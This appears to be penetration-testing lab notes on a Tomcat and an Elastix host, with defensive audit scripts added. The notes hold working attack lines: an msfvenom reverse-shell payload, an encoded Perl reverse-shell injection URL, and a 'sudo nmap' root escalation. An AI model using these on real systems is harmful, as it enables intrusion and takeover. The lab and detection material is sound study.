10.11.1.209
Nikto scan result: Default account found for 'Tomcat Manager Application' at /manager/html (ID 'tomcat', PW 'tomcat'). Apache Tomcat.
Visited port 8080, found the manager login page, tried tomcat / tomcat and logged in to the manager successfully.
Apache Tomcat - Account Scanner / 'PUT' Request Command Execution - Multiple remote Exploit
https://github.com/offensive-security/exploitdb-bin-sploits/blob/master/bin-sploits/18619.zip
Reverse shell, got root. cat /Desktop/proof.txt
(Untried alternative) msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.0.45 LPORT=1337 -f war > reverse.war
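As an added example (not part of these notes, and not Tomcat's own tooling), a Python audit of tomcat-users.xml, the file Tomcat reads for Manager Application credentials. It flags exactly what the Nikto hit above depends on: a well-known default pair such as tomcat/tomcat, an account whose password equals its username, and any account that holds a manager-* or admin-gui role at all. The XML is constructed sample input, and the DEFAULT_PAIRS list is an assumption to extend from your own baseline.

```python
"""Audit a Tomcat tomcat-users.xml for default or weak Manager credentials.

Added example, not from the original notes. The sample XML is constructed.
"""
import xml.etree.ElementTree as ET

# Well-known default username/password pairs seen in sample configs and
# installers (assumption: illustrative list, extend from your own baseline).
DEFAULT_PAIRS = {
    ("tomcat", "tomcat"),
    ("admin", "admin"),
    ("admin", ""),
    ("role1", "tomcat"),
    ("both", "tomcat"),
}

# Roles that grant access to the Manager / Host Manager web applications.
MANAGER_ROLES = {"manager-gui", "manager-script", "manager-jmx",
                 "manager-status", "admin-gui", "admin-script"}

# Constructed sample tomcat-users.xml (not the lab host's file).
SAMPLE_TOMCAT_USERS = """<tomcat-users>
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="tomcat" roles="manager-gui,manager-script"/>
  <user username="deploy" password="deploy" roles="manager-script"/>
  <user username="ops" password="Zq8!vXr2-long-random" roles="manager-gui"/>
  <user username="reader" password="s3cret-r0le" roles="tomcat"/>
</tomcat-users>
"""


def audit_tomcat_users(xml_text):
    """Return a list of (username, finding) tuples for accounts needing review."""
    findings = []
    root = ET.fromstring(xml_text)
    # Newer Tomcat versions may emit a default namespace; match on local name.
    for user in root.iter():
        if user.tag.split("}")[-1] != "user":
            continue
        name = user.get("username", user.get("name", ""))
        password = user.get("password", "")
        roles = {r.strip() for r in user.get("roles", "").split(",") if r.strip()}
        if (name, password) in DEFAULT_PAIRS:
            findings.append((name, "well-known default credential"))
        elif password and password.lower() == name.lower():
            findings.append((name, "password equals username"))
        manager = roles & MANAGER_ROLES
        if manager:
            findings.append((name, "holds manager role(s): " + ",".join(sorted(manager))))
    return findings


if __name__ == "__main__":
    for user, issue in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print(f"{user}: {issue}")
```

Run it against the real file (by default under $CATALINA_BASE/conf/) after a Nikto hit like the one above; anything reported with a manager role should be removed or given a unique, strong password, and the manager application itself should not be reachable from untrusted networks.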
10.11.1.217
admin / admin got into the admin panel; found version 2.2.0 sear… searched for Elastix 2.2.0 and used exploits/php/webapps/18650.py
Extracted and modified the code to:
https://10.11.1.217/recordings/misc/callme_page.php?action=c&callmenum=1000@from-internal/n%0D%0AApplication:%20system%0D%0Adata:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%2210.11.0.101%3a443%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A
Visiting it returns a shell. Following the notes in 18650.py:
sudo nmap --interactive
nmap> !sh
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
Got root.
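As an added example (not from these notes and not part of Elastix, nmap or any project), defender-side checks for the two steps used against this host. The first function scans Apache access-log lines for requests to recordings/misc/callme_page.php whose callmenum value, once URL-decoded, carries CR/LF characters or an injected "Application:" line, which is the shape of the request above (a legitimate callmenum is a bare extension such as 1000). The second reviews sudoers text for rules that grant nmap via sudo, the escalation step above, and for any NOPASSWD rule. The log lines and sudoers content are constructed sample input, and the sudoers parser only handles plain single-line rules.

```python
"""Defender-side checks for the callme_page.php injection and sudo nmap steps.

Added example, not from the original notes. All sample input is constructed.
"""
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (Apache combined format, trimmed).
SAMPLE_ACCESS_LOG = [
    '10.11.0.101 - - [01/Jan/2024:10:00:01 +0000] "GET /recordings/misc/callme_page.php?action=c&callmenum=1000 HTTP/1.1" 200 512',
    '10.11.0.101 - - [01/Jan/2024:10:00:05 +0000] "GET /recordings/misc/callme_page.php?action=c&callmenum=1000@from-internal/n%0D%0AApplication:%20system%0D%0Adata:%20id%0D%0A%0D%0A HTTP/1.1" 200 512',
    '10.11.0.55 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php HTTP/1.1" 200 2048',
]

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
CALLME_PATH = "/recordings/misc/callme_page.php"


def flag_callme_injections(log_lines):
    """Return (line_no, client_ip, decoded_callmenum) for suspicious requests."""
    hits = []
    for i, line in enumerate(log_lines, start=1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if not url.path.endswith(CALLME_PATH):
            continue
        # parse_qs percent-decodes once; unquote again to catch double encoding.
        for raw in parse_qs(url.query).get("callmenum", []):
            value = unquote(raw)
            if "\r" in value or "\n" in value or re.search(r"(?i)application\s*:", value):
                hits.append((i, line.split()[0], value))
    return hits


# Constructed sample sudoers content (not the lab host's file).
SAMPLE_SUDOERS = """\
# constructed sample /etc/sudoers
Defaults    requiretty
root    ALL=(ALL)       ALL
asterisk ALL=(ALL) NOPASSWD: /usr/bin/nmap, /sbin/iptables
%wheel  ALL=(ALL)       ALL
backup  ALL=(root) /usr/bin/rsync
"""

# who  host=(runas) [NOPASSWD:] cmd, cmd ...   (single-line rules only)
SUDOERS_RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<spec>.+)$"
)


def audit_sudoers(text):
    """Return (who, reason) tuples for sudoers rules a reviewer should look at."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = SUDOERS_RULE_RE.match(line)
        if not m:
            continue
        who, spec = m.group("who"), m.group("spec")
        commands = [c.strip() for c in re.sub(r"\bNOPASSWD:|\bPASSWD:", "", spec).split(",")]
        # Basename of each command, ignoring arguments.
        names = {c.split("/")[-1].split()[0] for c in commands if c}
        if "nmap" in names:
            findings.append((who, "nmap allowed via sudo (older versions expose a root shell through --interactive)"))
        if "NOPASSWD:" in spec:
            findings.append((who, "NOPASSWD rule: " + spec))
    return findings


if __name__ == "__main__":
    for line_no, ip, value in flag_callme_injections(SAMPLE_ACCESS_LOG):
        print(f"line {line_no} from {ip}: callmenum={value!r}")
    for who, reason in audit_sudoers(SAMPLE_SUDOERS):
        print(f"sudoers: {who}: {reason}")
```

Feed real access logs through flag_callme_injections to spot the injection attempts against an unpatched Elastix 2.2.0 install; audit_sudoers is the check that would have caught the sudo nmap rule before it was used.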